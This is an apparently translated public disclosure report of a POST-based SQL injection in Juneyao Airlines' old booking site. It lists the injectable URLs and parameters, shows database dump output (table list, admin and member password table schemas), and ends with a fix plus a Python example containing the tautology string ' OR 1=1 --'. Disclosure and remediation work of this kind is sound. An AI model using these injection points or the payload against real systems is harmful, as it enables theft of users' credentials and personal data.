Vulnerability summary
Vulnerability details
Disclosure status:
2013-12-28: details reported to the vendor, awaiting vendor handling
2013-12-31: vendor confirmed; details visible to the vendor only
2014-01-10: details opened to core white hats and relevant domain experts
2014-01-20: details opened to regular white hats
2014-01-30: details opened to intern white hats
2014-02-11: details opened to the public
Brief description:
POST-based SQL injection on a Juneyao Airlines site leaks the password information and other sensitive data of 1.7 million users.
Detailed description:
Juneyao Airlines' old site: http://2012b2c.juneyaoair.com/
The old site still uses the same database as the new one: I registered an account and it worked on both the new and the old site.
Injection points:
http://2012b2c.juneyaoair.com/crmInterLogin.do loginPwdId=123456&loginNameId=123456 (the loginNameId parameter is not sanitized)
http://2012b2c.juneyaoair.com/resetPwd.do loginType=1&sendType=1&id=88952634 (the id parameter is not sanitized)
Dumping the database:
Tables in the current database:
Database: HOFFP
[181 tables]
+--------------------------------+
| AAA                            |
| TBL_ADDRESS_CITY               |
| TBL_AIRLINE                    |
| TBL_AIRLINE_CODE_SHARE         |
| TBL_AIRPORT                    |
| TBL_BILLING_FILE_INFO          |
| TBL_CARD_NUMBER_ASSIGN         |
| TBL_CARD_NUMBER_CREATE_HIS     |
| TBL_CHARACTER_SPELL_INDEX      |
| TBL_CITY                       |
| TBL_CKI_INFO                   |
| TBL_CLASS                      |
| TBL_CLASS_EXCHANGE_RULE        |
| TBL_CLASS_MULTIPLIER_RULE      |
| TBL_CLASS_TYPE                 |
| TBL_COLLECT_PNR                |
| TBL_COMPANY_ACCOUNT            |
| TBL_COMPANY_ACCUMULATE_RULE    |
| TBL_COMPANY_EXTRA_ACTIVITY     |
| TBL_COMPANY_FLIGHT_ACTIVITY    |
| TBL_COMPANY_INFO               |
| TBL_COMPANY_MEMBER             |
| TBL_COMPANY_MILES_DETAIL       |
| TBL_COMPANY_MILES_EXPIRE       |
| TBL_COMPANY_MILES_SPEND        |
| TBL_COMPANY_PASSWORD_ALTER_HIS |
| TBL_COMPANY_REDEEM_RULE        |
| TBL_COMPANY_TYPE               |
| TBL_COUNTRY                    |
| TBL_CUSTOMER_ADDRESS           |
| TBL_CUSTOMER_B2C               |
| TBL_CUSTOMER_CERTIFICATE       |
| TBL_CUSTOMER_CONTACT           |
| TBL_CUSTOMER_INFO              |
| TBL_CUSTOMER_INFO_TEMP         |
| TBL_DATA_EXCHANGE_ERRCODE      |
| TBL_DATA_EXCHANGE_HIS          |
| TBL_EMAIL_JOB_ACCOUNT          |
| TBL_EMAIL_JOB_LIST             |
| TBL_ENROLLMENT_SOURCE          |
| TBL_EXTRA_MILES_RULE           |
| TBL_FLIGHT_ACTIVITY            |
| TBL_FLIGHT_BALANCE_ACTIVITY    |
| TBL_FLIGHT_CONTROL_RULE        |
| TBL_FLIGHT_REDEEM              |
| TBL_FLIGHT_REDEEM_DETAIL       |
| TBL_FLIGHT_REDEEM_EXPENSE_RULE |
| TBL_FLIGHT_REDEEM_REJECT       |
| TBL_FLIGHT_REDEEM_RULE         |
| TBL_FLIGHT_REDEEM_TEMP         |
| TBL_FLIGHT_REJECT_ACTIVITY     |
| TBL_FLIGHT_TEMP_ACTIVITY       |
| TBL_FORCE_IMPORT_APPCODE       |
| TBL_INFO_CUSTOM_TYPE           |
| TBL_INFO_DISTRIBUTE            |
| TBL_INITIAL_REDEEM_RULE        |
| TBL_INVALID_TICKET_HISTORY     |
| TBL_IRREGULAR_REASON           |
| TBL_JOB_MESSAGE_CONFIG         |
| TBL_JOB_SETTING                |
| TBL_KEYCUSTOMER_AGREEMENT      |
| TBL_KEYCUSTOMER_AGREEMENT_SUB  |
| TBL_KEYCUSTOMER_COUPON_HIS     |
| TBL_KEYCUSTOMER_EXPAND_ASSIGN  |
| TBL_KEYCUSTOMER_INFO           |
| TBL_KEYCUSTOMER_NOTICE         |
| TBL_KEYCUSTOMER_REDEEM         |
| TBL_KEYCUSTOMER_SETTLEMENT     |
| TBL_KEYCUSTOMER_TICKET_HIS     |
| TBL_KEYCUSTOMER_VISIT_HIS      |
| TBL_KEYCUSTOMER_VISIT_TASK     |
| TBL_LOCAL_ACCRUAL_RULE         |
| TBL_LOCAL_ASSIGN_GROUP         |
| TBL_MEMBER_ACTIVITY_DETAIL     |
| TBL_MEMBER_ACTIVITY_SPEND      |
| TBL_MEMBER_BENEFIC_CHANGE_HIS  |
| TBL_MEMBER_BENEFIC_INFO        |  
| TBL_MEMBER_BENEFIC_RULE        |
| TBL_MEMBER_CARD                |
| TBL_MEMBER_CARD_STATUS         |
| TBL_MEMBER_CURRENT_ACCOUNT     |
| TBL_MEMBER_EXTRA_ACTIVITY      |
| TBL_MEMBER_FULFILLMENT_HISTORY |
| TBL_MEMBER_FULFILMENT_FILE_HIS |
| TBL_MEMBER_GROUP_CODE          |
| TBL_MEMBER_GROUP_HISTORY       |
| TBL_MEMBER_ID_MERGE_HIS        |
| TBL_MEMBER_ID_USAGE            |
| TBL_MEMBER_INFO                |
| TBL_MEMBER_INFO_CHANGE_HISTORY |
| TBL_MEMBER_LEVEL               |
| TBL_MEMBER_LEVEL_CHANGE_HIS    |
| TBL_MEMBER_LEVEL_UPGRADE_RULE  |
| TBL_MEMBER_MILEAGE_ACCOUNT     |
| TBL_MEMBER_MILEAGE_ADJUST      |
| TBL_MEMBER_MILEAGE_EXPIRE      |
| TBL_MEMBER_PASSWORD            |
| TBL_MEMBER_PASSWORD_ALTER_HIS  |
| TBL_MEMBER_PROMOTION_ACTIVITY  |
| TBL_MEMBER_PROMOTION_TRACE     |
| TBL_MEMBER_REFULFILLMENT_HIS   |
| TBL_MEMBER_RELATION_ASSIGN     |
| TBL_MEMBER_SERVICE_RECORD      |
| TBL_MEMBER_STATUS              |
| TBL_MEMBER_STATUS_CHANGE_HIS   |
| TBL_MEMBER_SUPPLIER_INFO       |
| TBL_MEMBER_VERIFYCODE          |
| TBL_MEMBER_WEB_LOGON_HISTORY   |
| TBL_MESSAGE_CONFIG             |
| TBL_MILEAGE_PURCHASE           |
| TBL_MILEAGE_PURCHASE_REJECT    |
| TBL_MILEAGE_PURCHASE_RULE      |
| TBL_MILEAGE_PURCHASE_TEMP      |
| TBL_MILEAGE_VERIFY             |
| TBL_MW_CLIENT_INFO             |
| TBL_MW_LOG                     |
| TBL_NETPAY_ORDER_HISTORY       |
| TBL_NETPAY_ORDER_MANUAL_HIS    |
| TBL_NOTE                       |
| TBL_NOTE_TYPE                  |
| TBL_NOTFLIGHT_REDEEM_RULE      |
| TBL_NOT_FLIGHT_ACTIVITY        |
| TBL_NOT_FLIGHT_REDEEM          |
| TBL_NOT_FLIGHT_REDEEM_REJECT   |
| TBL_NOT_FLIGHT_REDEEM_TEMP     |
| TBL_PARAMETERS                 |
| TBL_PARAMETERS_TYPE            |
| TBL_PROGRAM_COUNTRY            |
| TBL_PROMOTION_CHILD_RULE       |
| TBL_PROMOTION_FLIGHT_RULE      |
| TBL_PROMOTION_MASTER_RULE      |
| TBL_PROMOTION_NOT_FLIGHT_RULE  |
| TBL_PROMOTION_VIP_RULE         |
| TBL_PROVINCE                   |
| TBL_PURCHASE_TICKET            |
| TBL_QUALIFICATION_REASON       |
| TBL_REDEEM_CONTROL_RULE        |
| TBL_REDEEM_QUANTITY_RULE       |
| TBL_REDEEM_SPECIAL_RULE        |
| TBL_ROLES                      |
| TBL_ROLES_RIGHTS               |
| TBL_SALUTATION                 |
| TBL_SEGMENT_CONTROL_RULE       |
| TBL_SEGMENT_MILEAGE            |
| TBL_SENDING_SOURCE             |
| TBL_SERVICE_CUSTOM_CONFIG      |
| TBL_SMS_SEND_HISTORY           |
| TBL_SMS_TYPE                   |
| TBL_SPECIAL_CLASS_RULE         |
| TBL_SPECIAL_PROMOTION_RULE     |
| TBL_STATEMENT_CONTENT          |
| TBL_STATEMENT_DETAIL           |
| TBL_STATEMENT_INFO             |
| TBL_STATEMENT_SEND_HISTORY     |
| TBL_STATIC_MEMBER_GROUP        |
| TBL_SUPPLIER                   |
| TBL_SUPPLIER_ACCRUAL_RULE      |
| TBL_SUPPLIER_ASSIGN_GROUP      |
| TBL_SUPPLIER_BALANCE           |
| TBL_SUPPLIER_BILLINGFILE_HIS   |
| TBL_SUPPLIER_CLASS_RULE        |
| TBL_SUPPLIER_DATAEXP_SEQNO     |
| TBL_SUPPLIER_FLIGHT_ACTIVITY   |
| TBL_SUPPLIER_FLIGHT_BALANCE    |
| TBL_SUPPLIER_GROUP             |
| TBL_SUPPLIER_PRODUCT           |
| TBL_SUPPLIER_PRODUCT_TYPE      |
| TBL_SUPPLIER_PROTOCOL_CONFIG   |
| TBL_SUPPLIER_TEMPLATE_CONFIG   |
| TBL_SUPPRETRO_REGISTER         |
| TBL_SUPP_MIN_MILES_RULE        |
| TBL_SYSTEM_FUNCTION_MANAGER    |
| TBL_SYSTEM_LOG                 |
| TBL_SYSTEM_PARAMETER           |
| TBL_UNITED_CARD_COMPANY        |
| TBL_USERS                      |
| TBL_USER_ROLES                 |
| TBL_VIRTUAL_TICKETNO_RULE      |
| TEMP1                          |
| TEMP2                          |
| UPGRADE_CABIN_INFO             |
+--------------------------------+
Dumping the users table, which appears to be the back-office admin table:
Table: TBL_USERS
[10 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| COMMENTS        | VARCHAR2 |
| DEPARTMENT_CODE | VARCHAR2 |
| OPERATE_DATE    | DATE     |
| OPERATE_USER_ID | VARCHAR2 |
| STATUS          | VARCHAR2 |
| UPDATE_DATE     | DATE     |
| UPDATE_USER_ID  | VARCHAR2 |
| USER_ID         | VARCHAR2 |
| USER_NAME       | VARCHAR2 |
| USER_PASSWORD   | VARCHAR2 |
+-----------------+----------+
Over 160 back-office users:
Dumping the member information:
Database: HOFFP
Table: TBL_MEMBER_PASSWORD
[12 columns]
+-----------------+----------+
| Column          | Type     |
+-----------------+----------+
| B2C_PASSWORD    | VARCHAR2 |
| COMMENTS        | VARCHAR2 |
| ID              | NUMBER   |
| MEMBER_ID       | VARCHAR2 |
| OPERATE_DATE    | DATE     |
| OPERATE_USER_ID | VARCHAR2 |
| PASSWORD        | VARCHAR2 |
| PSW_STATUS      | VARCHAR2 |
| RESET_ANSWER    | VARCHAR2 |
| RESET_QUESTION  | VARCHAR2 |
| UPDATE_DATE     | DATE     |
| UPDATE_USER_ID  | VARCHAR2 |
+-----------------+----------+
User login account and password information:
Proof of vulnerability:
Fix recommendation:
Sanitize the injectable parameters and fix the injection.
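The two injection points above share one root cause: a request parameter such as loginNameId is spliced into the SQL text, so the fix is to bind it as a parameter rather than to filter characters. The following is an added illustration, not code from the report or from the site; it assumes a login lookup against a constructed two-column subset of TBL_MEMBER_PASSWORD, and uses sqlite3 as a stand-in for the Oracle database behind the real .do endpoint.

```python
"""Added example (not from the original report): the unsafe pattern behind an
injectable login parameter such as loginNameId, beside the parameterized fix.
sqlite3 stands in for the site's Oracle database; the schema is a constructed
subset of TBL_MEMBER_PASSWORD (MEMBER_ID, B2C_PASSWORD)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a single member row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE TBL_MEMBER_PASSWORD (MEMBER_ID TEXT, B2C_PASSWORD TEXT)")
    conn.execute("INSERT INTO TBL_MEMBER_PASSWORD VALUES ('10001', 's3cret')")
    return conn


def login_vulnerable(conn, login_name: str, login_pwd: str):
    """Unsafe: request parameters are concatenated into the SQL text, so
    whatever the client sends in loginNameId is parsed as part of the query."""
    sql = ("SELECT MEMBER_ID FROM TBL_MEMBER_PASSWORD WHERE MEMBER_ID = '"
           + login_name + "' AND B2C_PASSWORD = '" + login_pwd + "'")
    return conn.execute(sql).fetchone()


def login_fixed(conn, login_name: str, login_pwd: str):
    """Fixed: bound parameters are passed to the driver as data, never as SQL,
    so no character in the input can change the query structure."""
    sql = ("SELECT MEMBER_ID FROM TBL_MEMBER_PASSWORD "
           "WHERE MEMBER_ID = ? AND B2C_PASSWORD = ?")
    return conn.execute(sql, (login_name, login_pwd)).fetchone()


def probe(login_name: str, login_pwd: str) -> dict:
    """Run the same credentials through both variants on a fresh database."""
    db = make_db()
    return {"vulnerable": login_vulnerable(db, login_name, login_pwd),
            "fixed": login_fixed(db, login_name, login_pwd)}


if __name__ == "__main__":
    # A textbook tautology string: the unsafe variant returns a row without
    # the password; the fixed variant treats the string as a literal name.
    print(probe("' OR 1=1 --", "wrong"))
    print(probe("10001", "s3cret"))  # legitimate login still works when fixed
```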
Copyright notice: please credit the source when reposting. 爱上襄阳@乌云
Vulnerability response
Vendor response:
Severity: High
Vulnerability rank: 11
Confirmed: 2013-12-31 10:11
Vendor reply:
CNVD has confirmed the described situation and has contacted the website's managing organization and its administrators through public contact channels to handle it.
Latest status:
None yet